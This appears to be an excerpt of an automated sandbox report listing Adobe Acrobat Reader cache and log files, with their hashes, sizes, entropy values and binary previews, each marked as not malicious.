                                                    SSDEEP:3:m+lstxt08RzYOCGLvHkWBGKuKjXKX+IAuAJVKjXKLuVSKln9qDpktCWPmJelc0Ry:mLrnYOFLvEWdrIoJUQMl9DtZeJIi1
                                                    MD5:305369E68830BDDF94C570DADBD79AE4
                                                    SHA1:1D900B18C1B77E6E3668AB26C0D88E1B32372746
                                                    SHA-256:563997E0D9176B9BFAE345F79A938A5341440A20A3EE3B44AEB3CC43842297F7
                                                    SHA-512:AE5F53FB9F13CFA7EAD985DE58FD24F6404DA957210B00F9E7396C66267F86788DB222437683D81428B0BBAD55144C0177B768E8CF7AE26021CCAC1C8D0003B7
                                                    Malicious:false
                                                    Preview:0\r..m......U..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files-select/js/plugin.js ......[/....."#.D......A.A..Eo......<..8.........;"./N_.,.:C..2....9L.H...3:...A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):208
                                                    Entropy (8bit):5.5744814651178425
                                                    Encrypted:false
                                                    SSDEEP:3:m+lQ/pqv8RzYOCGLvHkWBGKuKjXKX+IALKPWFvEsK2DVLktKs56mgmOZLhT7Um1:mOEYOFLvEWdrIhu2qRQtl5zgm2d/1
                                                    MD5:E7245E7D629ED0AF7A6043535FFEA975
                                                    SHA1:491D4A13B83FDEAC400677CCA06BEB19E146872A
                                                    SHA-256:B6021A246AD1E7B1436E3E46041517C700B9817CAFC62610DBE1D38B5889B8D4
                                                    SHA-512:1175059C89279C7F878D35FB91068D9080C44A4BF5297B0C239EA4BE1BBC6A89A7BB667646C66C08B3E51F5DC021D9193C2F21ECFC30E19AEC60E68FF2D8487B
                                                    Malicious:false
                                                    Preview:0\r..m......P....r......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/selector.js .....[/....."#.D6......A.A..Eo......[.z.........Z.Z}Q..4.o....0+..[|..n:*..U.W.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):188
                                                    Entropy (8bit):5.539883025907605
                                                    Encrypted:false
                                                    SSDEEP:3:m+l8UElLA8RzYOCGLvHkWBGKuKPK7CvbIyC8k9WktKteBiaQ562HvpMm1:mAElVYOFLvEW1Kz8k9jturx56uvp1
                                                    MD5:4C88CCAF8CC193F52C7474854948E628
                                                    SHA1:8C4EB5A2FD7CC51FA6969282DCF73FD335BA2C89
                                                    SHA-256:64C883225D461C3692D745470252C1461F67A5A8A72607C00B4793D5E72F38E0
                                                    SHA-512:EDDC293EADD2C787FB7E60952030B186A0A5B604F599DCADA4D5FC0D1D73EC4F23A4464F53B75FE655D4882BDFDBEE4C1E55F63D0D62F5B9C872A9599B239122
                                                    Malicious:false
                                                    Preview:0\r..m......<...)6......_keyhttps://rna-resource.acrobat.com/static/js/rna-main.js ..yr..[/....."#.Dr.....A.A..Eo.........F........z?...SwC...^..y.....V..7R-O.....A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):214
                                                    Entropy (8bit):5.6082697955051355
                                                    Encrypted:false
                                                    SSDEEP:6:mWYOFLvEWdBJvvuLp19tRdUDLYtmOZn1:xRBJGNHWDcFZ
                                                    MD5:5F91411852BE1F016EC4F25D2BF63DBB
                                                    SHA1:3CDD497164613207063B4068D9E9087FF934B239
                                                    SHA-256:BA19350F8249BD2890E282D1DC5E02F94363AE9EA02998E555DE19C25DC5A922
                                                    SHA-512:52A547CBFFCA274BA9422C53E0E5E7786BF9001818FEB3BFE81F2F5E2848F9FE7A5D76B8B655067269C97B6F10CE7BD8F710F96D7462D2CA20773A7F2C5BC804
                                                    Malicious:false
                                                    Preview:0\r..m......V.....h....._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/selector.js ..V...[/....."#.DN......A.A..Eo......G.Fj............t.q..W.EZ....1...[.zC.7mD..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):211
                                                    Entropy (8bit):5.613290832713583
                                                    Encrypted:false
                                                    SSDEEP:3:m+lxCq//6v8RzYOCGLvHkWBGKuKCH6U4LJzWHK7WFvVG84k9WktjslFpSKGoSSlf:msRPYOFLvEWIa7zp73840jtjsX8VPu1
                                                    MD5:44DDC3EBEB5284C2F0B4C33FA2368604
                                                    SHA1:826DD99D100D0E24737ABF06E49A2C0EFB8CA1E2
                                                    SHA-256:F70F20265CE6EC1EAA4CBF17EFF41267EA4C3456E6D5DBE0E97559080B97D0D4
                                                    SHA-512:5E477A92489362353603474B3EBDBC8D45502D6A40581B9A79FA8924B9AB33E4E258EA0ACEFB7BD6BE12E6D3E0A621FA5739F1782D33DDFED75F617FCD659159
                                                    Malicious:false
                                                    Preview:0\r..m......S...{.j....._keyhttps://rna-resource.acrobat.com/static/js/libs/require/2.1.15/require.min.js .-.p..[/....."#.D.......A.A..Eo.......k.............L...Im.@.........E.nW...IP..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf0ac66ae1eb4a7f_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):208
                                                    Entropy (8bit):5.628911693221754
                                                    Encrypted:false
                                                    SSDEEP:3:m+lQi9lC8RzYOCGLvHkWBGKuKjXKVRNUpXKLuVQoD4k9Wkt4Hl/n6F4XVAZ+8cV4:mKPYOFLvEWdENU9Qho19jtQt6wiM3Y1
                                                    MD5:E2C4572EA78877098528F7F5174F5836
                                                    SHA1:B452EFD8A7A9F9790956008DA55D08D58F21E3F5
                                                    SHA-256:8C3788830D2A1017131A5FB10FAB817EDFDFB59882890AAC006FBB880BED6DF8
                                                    SHA-512:1B593ADFF3E10DE0493831AFAE802DB95CF60B35A7C3F2F880DE175010A6625D8C57CF5F5C278DAF2754EC3631A2714A134628B634F5FECADA1357FAFA898BBC
                                                    Malicious:false
                                                    Preview:0\r..m......P...Yft....._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/plugin.js ......[/....."#.D......A.A..Eo......q..............M....m+lS..e.....<7.U.P8*.0K.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):208
                                                    Entropy (8bit):5.586340765470441
                                                    Encrypted:false
                                                    SSDEEP:3:m+lQWt6v8RzYOCGLvHkWBGKuKjXKjcAW6KLuVsi4LktZv4MY3jBMQ7GRzXP5m1:mQt6EYOFLvEWdccAHQ9etMjBRCh/41
                                                    MD5:3580F8810D03E7848CAEDFB4ECD5E0C7
                                                    SHA1:C8417126CA662DD1E51BF868F99817C1A16A12C9
                                                    SHA-256:603182F2CA7737E289613D972F43B1FE769494C921F40622CE920CACB0BD5FFD
                                                    SHA-512:65FDC1FF85333A6C8C9B38735FFFD1489A1EC16A17C4BBCFCA1F8262B959A12AFD42FBCED5DDAD007ACFC149A3EEB4602CDCC69EEBE56614F6E7C27E4BAA32FB
                                                    Malicious:false
                                                    Preview:0\r..m......P...W3......_keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/plugin.js .. ...[/....."#.D+......A.A..Eo.........R........PJm...0x.x..RD...BB!@5..<..]....A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d449e58cb15daaf1_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):231
                                                    Entropy (8bit):5.5436802774577485
                                                    Encrypted:false
                                                    SSDEEP:6:mqs6XYOFLvEWdFCi5mhu6A+4QtUkULlF4r1:bs6xRkiZ+Hi7LlF4
                                                    MD5:0A3E1FC1C2F922F141CD8C8CC9015F7B
                                                    SHA1:D316700FBAD6B1C88CA08C586BA72F4958247EBE
                                                    SHA-256:ACEA686492713668D700F365D196F1AE5BB8014C4F7E0C599093E0232BD9C9CC
                                                    SHA-512:9558CD383B48D28300064FA34FB8FFA4D98A1F03A122EBD7F55E8444B3271C495537754FCDA1A994893F0702AD8C44E90D5C04CDA5C88F2B7D3927054CA0A591
                                                    Malicious:false
                                                    Preview:0\r..m......g...~.I?...._keyhttps://rna-resource.acrobat.com/static/js/plugins/aicuc/js/plugins/rhp/exportpdf-rna-selector.js ..mI..[/....."#.DOw.....A.A..Eo.........e.........P...#4..l....5...5..).w.. .h.~..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d88192ac53852604_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):215
                                                    Entropy (8bit):5.524702002968718
                                                    Encrypted:false
                                                    SSDEEP:3:m+lPHYs8RzYOCGLvHkWBGKuKjXKXqjuSKPWFvIYIKll1+p9WktL91ECcu1isLK5y:mhYOFLvEWd/aFuDk9jtJ1EN941
                                                    MD5:46F87A2BFE257F2BDBC2905447A7AA2E
                                                    SHA1:3E14DCD34E9647E8817C5D99418A37EB978FF83E
                                                    SHA-256:20AFECB85324CCFBA3C49552D65FF9066AAFC4B5D09F0CC4CAD2666D8B61D93E
                                                    SHA-512:741C2800D62EFC9673D223AB466D005DAF94E16E72827DFBED4AEAADF9B1F6236A20FA5D10228C7881ADBF2934968A33D2BFAC9E88397C986D212C7F87B3AB0B
                                                    Malicious:false
                                                    Preview:0\r..m......W....w.m...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-recent-files/js/selector.js ..p...[/....."#.Dp......A.A..Eo........?...........a.f.m.i.o.p..3U5.....^...I.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\de789e80edd740d6_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):208
                                                    Entropy (8bit):5.5540884843516904
                                                    Encrypted:false
                                                    SSDEEP:6:mR9YOFLvEWd7VIGXOdQEKQTtUHjBMqVd3G4K41:2DRuRjaDB9Vd2
                                                    MD5:8405ECA73195CB91D207FB0202F6F8FD
                                                    SHA1:66B53ADD14DDFCE13D45E8F7EE60B8F78DB1064D
                                                    SHA-256:60D4D97B147A70ACE66266050F872249F15410E3F6E00314B326F7DDCF9A5983
                                                    SHA-512:E48D84E781B02FF2D3848DBF851F5CB7D7EA62E8855D1E34D22DAD2C4DD5527057E596AD9AEF778A818A56D276CBFFA05C4B3874CAEEF7ACDA9E3906C4E6B4EA
                                                    Malicious:false
                                                    Preview:0\r..m......P...y.p....._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/plugin.js .sZ...[/....."#.D;......A.A..Eo......EF............y.$..$.v5j...T...z.]..._S....A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):208
                                                    Entropy (8bit):5.581190702458038
                                                    Encrypted:false
                                                    SSDEEP:3:m+lQyu6OA8RzYOCGLvHkWBGKuKjXK9QXAdWKjKLuVKlgUkt6RW4ThzJuA4bi44m1:mkqYOFLvEWd8CAd9Qkt6LuA424r1
                                                    MD5:26278210A23811FBFF548D07713F887A
                                                    SHA1:399154CDE085077495583C0A296437F03291227A
                                                    SHA-256:86040960C16A22B46FDA62E1F768EED024FCDF0BA8AD051394562C47354B5831
                                                    SHA-512:5ED51FD2B0C23275CCBA4CB6C5D1D157F560939D933C6D3544B8F47295F24544173BB152E7DC2927738418FEFFFEA805991FB4E6490B1A302B98451683344DC9
                                                    Malicious:false
                                                    Preview:0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js ..*...[/....."#.D-A.....A.A..Eo......4l(I........#..@..k(v.8g..5.~_....]Pj.*..6.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f4a0d4ca2f3b95da_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):210
                                                    Entropy (8bit):5.56721552023399
                                                    Encrypted:false
                                                    SSDEEP:3:m+lS5Etla8RzYOCGLvHkWBGKuKjXKVRNUp/KPWFvw4kYIBD+4kUktokXl7Ag2iH1:moXXYOFLvEWdENUAuIYI1O9tx2yC8n1
                                                    MD5:7E121D7F029851969DFAB043E4CDE2D2
                                                    SHA1:9D8CE44C63B5F9EE616BAC70A64080DFB696D753
                                                    SHA-256:A2E6848368B4C29D06B7DFB5F1FACF4E58675D7BF4057349013B625B61619474
                                                    SHA-512:EE1587E682DF6AC558BECD989D0708C354F20431A9673A37E9E3DC3388666B11EA1CB83C3E5DA484C2F50914666B2A0D515568F6CF0F6D4EC5DB4224F3A9CB7D
                                                    Malicious:false
                                                    Preview:0\r..m......R..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/selector.js ......[/....."#.D=......A.A..Eo......bmU.........8.../...;.\\o....1..........+..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):221
                                                    Entropy (8bit):5.618510117274578
                                                    Encrypted:false
                                                    SSDEEP:6:mQZYOFLvEWdrROk/VQP0KtlY/tsLmB41:nRrROk/V7KAlN
                                                    MD5:B8AB921A92ADC273E5C0D83513BA1472
                                                    SHA1:13204837DF25C22BE54F16588F967550BD464A40
                                                    SHA-256:9E4FAA72603FCC88733776DEC177DF89DFE49D3821E19B729B7368B13A4157D4
                                                    SHA-512:B8DE0683214AE611BE5504F63B8C0FD7B7A609C45125497D87084151B3FBE85E3A76279BD12DC004249409B081FBF5C0509D8C51FD10EF4939A5C3905A5D0803
                                                    Malicious:false
                                                    Preview:0\r..m......]......,...._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/plugin.js ..,...[/....."#.D.......A.A..Eo.......z.e........ ./.ev......N~..6.b.....$.j;:C...A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):210
                                                    Entropy (8bit):5.601276566234601
                                                    Encrypted:false
                                                    SSDEEP:6:mZ/lXYOFLvEWdccAWuKgdDKtardm9741:qxRcldDKUrdu7
                                                    MD5:C392447A4B28A63434627107743A4153
                                                    SHA1:0CA050765BE1CEA1D0ACC8F3DDACCA3CA5EE683E
                                                    SHA-256:110C25BB11691680A45546F3A2A2BD538A59450D2E509C2630B7833C783168CC
                                                    SHA-512:1ABD1771E3FF255B7C1F4578880C369545B5754A8376DA11FEA2033DEB0CCDB39FE33C026D41EB22223F65D97D094084B4E17874A585877CA0E6EFC86F1D6991
                                                    Malicious:false
                                                    Preview:0\r..m......R...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/selector.js .^....[/....."#.D$......A.A..Eo......a.'...........U...I.>P...X...x..0U.~;m.x.k.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):204
                                                    Entropy (8bit):5.549037757651236
                                                    Encrypted:false
                                                    SSDEEP:3:m+lUg18RzYOCGLvHkWBGKuKjXKrAUWiKPWFv/n+KCF8LktQUEB6shoq+Nem1:mMOYOFLvEWdwAPVuJ19QtLEB6Jn1
                                                    MD5:D46FF8C88D3AB5CA048C3913AE333022
                                                    SHA1:073E33F254E4E80708899D52DFAD78E5C0289961
                                                    SHA-256:9A26AA27FDE261B79C627FDA043089F0CBC8372BA3CA32326CD016448AC29DC4
                                                    SHA-512:1F96C8407C7342A65931FEFAC286967905041E534CC2DA5B59DA498BA5003FE3EC57560F60AD5ED06E19E233B4B26E5299A1AF9A7FA5BDCBFCA86E6AE0F92D4A
                                                    Malicious:false
                                                    Preview:0\r..m......L....Ey....._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/selector.js ..8...[/....."#.D.......A.A..Eo......./.!.............k....F..D..O.n;[.1m.....=..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fdd733564de6fbcb_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):212
                                                    Entropy (8bit):5.660481480044912
                                                    Encrypted:false
                                                    SSDEEP:6:m3PXYOFLvEWdBJvYQnW+40jtOlqhcsBXIh1:mxRBJQR+4Q44B
                                                    MD5:731F40A2BA3C9FEDF29D30F09F4D1708
                                                    SHA1:6ADF13235FB9F3D87A06611D6D0C9CB38FD23FC5
                                                    SHA-256:2054BE7797918B4ACAB1A3F634A87B3422A3C8731FCC5AEA1DD5E3BEDDDDF0C4
                                                    SHA-512:6ABD5372328035BFD7E44E9701D74B0B686A2FB4218473D52316FE8918D2F29A836B877D6934DC74E05D362E5E41B1DCCD5F49050BC2ABED11E52D36E7892055
                                                    Malicious:false
                                                    Preview:0\r..m......T......z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/plugin.js .....[/....."#.D+......A.A..Eo.....................k..`..N3.... ..d..$[.....{.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):228
                                                    Entropy (8bit):5.545826954973845
                                                    Encrypted:false
                                                    SSDEEP:6:msPYOFLvEWdrROk/RJUQQDKtfHLc3Me/1:3RrROk/sVKhr
                                                    MD5:A2265E10E4098AF2E895BB0D35FB8BEB
                                                    SHA1:4B528A3E041B058C50142137591443016C34CF05
                                                    SHA-256:AFE1DFAAB585CAFFA5D58800C71745AD2965971F23EBEAF45880AEC192CE018E
                                                    SHA-512:DC8600229E67290E859BE4A4E2B291B441F222E5F0048045D55B8357E6360EA373AF601129DE0D3FF68CFE10DBEDC69CAEA94FE4E3D0A37AE87899E6F0BF19A4
                                                    Malicious:false
                                                    Preview:0\r..m......d...<.s....._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/plugin.js .C/...[/....."#.D:......A.A..Eo.......7.v.............9Q].8O.z....=..:.N.{....N{.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\temp-index

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):1032
                                                    Entropy (8bit):5.094212402716158
                                                    Encrypted:false
                                                    SSDEEP:12:xuU5udGUF005G0Mzl+c2MVLE2VhJC5tKjGJBndAKag:xETFk0M8ykd0Kag
                                                    MD5:F24D3520CA59BD18F10318E973F5FC29
                                                    SHA1:149362174816FAB40FF37AB909BABDA096EBEC73
                                                    SHA-256:6713CED1B2743CCDB8C1ECDAF3E03768E27F63F00E6B193FB86AE2BDFEADE68A
                                                    SHA-512:1F239738B992DD4EEC74BADEB6903BB390FCB10D7007F41CC1CD90FE62B3DB051D3AB6AF1C8C414264A99EFA4ACB5F6C0024003F8D93E349187F5C9D0CF660C2
                                                    Malicious:false
                                                    Preview:....B..5oy retne....)........T............3.....}..[/..........v...q....m..[/..........C..M.....k...............#...(...k.............]...I...@..[/..................@..[/...........6<|.....m..[/.........<...W..J..m..[/..............oB*..m..[/...........a......m..[/...........;.y~A...}..[/...........P....V..}..[/.........F..=z;...}..[/.............o...}..[/...........*....}..[/...........2q......}..[/.........Gy.'.h...}..[/.............k7A...}..[/.........:..N.A....}..[/..........;/.....}..[/..................}..[/............P[. q..}..[/.........,+..._.#..}..[/..........J..j.....}..[/.........A?.2:....}..[/..............q...}..[/..........u\]..q..}..[/.........!...0.o..}..[/...........*......}..[/..........o..k....}..[/.........^.~..z...}..[/..........[.i..%...}..[/.........+.U.!..V..}..[/..........+.{..'..}..[/..........&.S......}..[/..........~.,.4>...}..[/............MV3....}..[/..........@..x...}..[/.........*)....J:..}..[/.............D.4...}..[/.........

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index (copy)

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1032
                                                    Entropy (8bit):5.094212402716158
                                                    Encrypted:false
                                                    SSDEEP:12:xuU5udGUF005G0Mzl+c2MVLE2VhJC5tKjGJBndAKag:xETFk0M8ykd0Kag
                                                    MD5:F24D3520CA59BD18F10318E973F5FC29
                                                    SHA1:149362174816FAB40FF37AB909BABDA096EBEC73
                                                    SHA-256:6713CED1B2743CCDB8C1ECDAF3E03768E27F63F00E6B193FB86AE2BDFEADE68A
                                                    SHA-512:1F239738B992DD4EEC74BADEB6903BB390FCB10D7007F41CC1CD90FE62B3DB051D3AB6AF1C8C414264A99EFA4ACB5F6C0024003F8D93E349187F5C9D0CF660C2
                                                    Malicious:false
                                                    Preview:....B..5oy retne....)........T............3.....}..[/..........v...q....m..[/..........C..M.....k...............#...(...k.............]...I...@..[/..................@..[/...........6<|.....m..[/.........<...W..J..m..[/..............oB*..m..[/...........a......m..[/...........;.y~A...}..[/...........P....V..}..[/.........F..=z;...}..[/.............o...}..[/...........*....}..[/...........2q......}..[/.........Gy.'.h...}..[/.............k7A...}..[/.........:..N.A....}..[/..........;/.....}..[/..................}..[/............P[. q..}..[/.........,+..._.#..}..[/..........J..j.....}..[/.........A?.2:....}..[/..............q...}..[/..........u\]..q..}..[/.........!...0.o..}..[/...........*......}..[/..........o..k....}..[/.........^.~..z...}..[/..........[.i..%...}..[/.........+.U.!..V..}..[/..........+.{..'..}..[/..........&.S......}..[/..........~.,.4>...}..[/............MV3....}..[/..........@..x...}..[/.........*)....J:..}..[/.............D.4...}..[/.........

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index~RF3d1a74.TMP (copy)

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1032
                                                    Entropy (8bit):5.094212402716158
                                                    Encrypted:false
                                                    SSDEEP:12:xuU5udGUF005G0Mzl+c2MVLE2VhJC5tKjGJBndAKag:xETFk0M8ykd0Kag
                                                    MD5:F24D3520CA59BD18F10318E973F5FC29
                                                    SHA1:149362174816FAB40FF37AB909BABDA096EBEC73
                                                    SHA-256:6713CED1B2743CCDB8C1ECDAF3E03768E27F63F00E6B193FB86AE2BDFEADE68A
                                                    SHA-512:1F239738B992DD4EEC74BADEB6903BB390FCB10D7007F41CC1CD90FE62B3DB051D3AB6AF1C8C414264A99EFA4ACB5F6C0024003F8D93E349187F5C9D0CF660C2
                                                    Malicious:false
                                                    Preview:....B..5oy retne....)........T............3.....}..[/..........v...q....m..[/..........C..M.....k...............#...(...k.............]...I...@..[/..................@..[/...........6<|.....m..[/.........<...W..J..m..[/..............oB*..m..[/...........a......m..[/...........;.y~A...}..[/...........P....V..}..[/.........F..=z;...}..[/.............o...}..[/...........*....}..[/...........2q......}..[/.........Gy.'.h...}..[/.............k7A...}..[/.........:..N.A....}..[/..........;/.....}..[/..................}..[/............P[. q..}..[/.........,+..._.#..}..[/..........J..j.....}..[/.........A?.2:....}..[/..............q...}..[/..........u\]..q..}..[/.........!...0.o..}..[/...........*......}..[/..........o..k....}..[/.........^.~..z...}..[/..........[.i..%...}..[/.........+.U.!..V..}..[/..........+.{..'..}..[/..........&.S......}..[/..........~.,.4>...}..[/............MV3....}..[/..........@..x...}..[/.........*)....J:..}..[/.............D.4...}..[/.........

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):292
                                                    Entropy (8bit):5.169741129193112
                                                    Encrypted:false
                                                    SSDEEP:6:k7O6dyq2Pwkn2nKuAl9OmbnIFUtIO68jz1ZmwuO68jlRkwOwkn2nKuAl9OmbjLJ:kFgvYfHAahFUtQgz1/egz5JfHAaSJ
                                                    MD5:075E4815EC3FA097629300311270CA61
                                                    SHA1:BE49359B7E1B0118BDFD227DD1C0DD45A098B0B9
                                                    SHA-256:0AD5795C7F74F7C6D2C3A22F7704AAF5CDAAA801E4229E2B963FAA4D9106D5B5
                                                    SHA-512:F6006572AE65AD29511CB7CD0099121E17FFCF1979E872E126231E48121868E851FE4BB415B46BD664BBBA4C960EF98EFEC25BCC173E870E8DC9E2BC9149D1DD
                                                    Malicious:false
                                                    Preview:2023/06/01-12:14:45.253 1a14 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/06/01-12:14:45.254 1a14 Recovering log #3.2023/06/01-12:14:45.254 1a14 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):292
                                                    Entropy (8bit):5.169741129193112
                                                    Encrypted:false
                                                    SSDEEP:6:k7O6dyq2Pwkn2nKuAl9OmbnIFUtIO68jz1ZmwuO68jlRkwOwkn2nKuAl9OmbjLJ:kFgvYfHAahFUtQgz1/egz5JfHAaSJ
                                                    MD5:075E4815EC3FA097629300311270CA61
                                                    SHA1:BE49359B7E1B0118BDFD227DD1C0DD45A098B0B9
                                                    SHA-256:0AD5795C7F74F7C6D2C3A22F7704AAF5CDAAA801E4229E2B963FAA4D9106D5B5
                                                    SHA-512:F6006572AE65AD29511CB7CD0099121E17FFCF1979E872E126231E48121868E851FE4BB415B46BD664BBBA4C960EF98EFEC25BCC173E870E8DC9E2BC9149D1DD
                                                    Malicious:false
                                                    Preview:2023/06/01-12:14:45.253 1a14 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/06/01-12:14:45.254 1a14 Recovering log #3.2023/06/01-12:14:45.254 1a14 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF3cb1f6.TMP (copy)

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):292
                                                    Entropy (8bit):5.169741129193112
                                                    Encrypted:false
